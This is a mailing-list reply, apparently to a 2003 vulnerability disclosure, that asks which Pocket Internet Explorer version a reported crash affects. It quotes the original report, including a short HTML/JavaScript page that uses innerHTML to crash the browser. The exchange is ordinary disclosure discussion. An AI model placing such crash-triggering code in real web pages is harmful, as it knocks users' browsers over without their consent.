Can you be specific about what version of PIE you tested this vulnerability on? If you look at the following web pages you will see that PIE only supports a few HTML tags. http://support.microsoft.com/default.aspx?scid=kb;en-us;Q161319 http://support.microsoft.com/default.aspx?scid=kb;EN-US;158479 Specifically the <SCRIPT> tag is not supported in PIE 1.0, 1.1 and 2.0. Only PIE 3.0 supports the <SCRIPT> tag. Does PIE 3.0 crash? > PROBLEM DESCRIPTION: > Calling a javascript from an object written to same page with the > object.innerHTML function causes Pocket Internet Explorer (PIE from now > on) > to crash. > > SOFTWARE AFFECTED: > Only PIE is affected, "regular" IE will show the pages as intented. > > EXAMPLE: > <html> > <head> > <title>Crash PIE</title> > <script language="Javascript"> > function displayPage(page){ > if(page=="onload"){ > main.innerHTML="<a href=\"#\" > onClick=\"displayPage('crash');\">Crash > me</a>"; > } > if(page=="crash"){ > main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You > are > going down!</a>"; > } > } > </script> > </head> > <body onLoad="displayPage('onload');"> > <hr> > <span id="main"></span> > </body></html> > > SOLUTIONS: > no known patch available > > > Problem was reported to MS (Norway) 2nd of January 2003. > > > Chris > > >
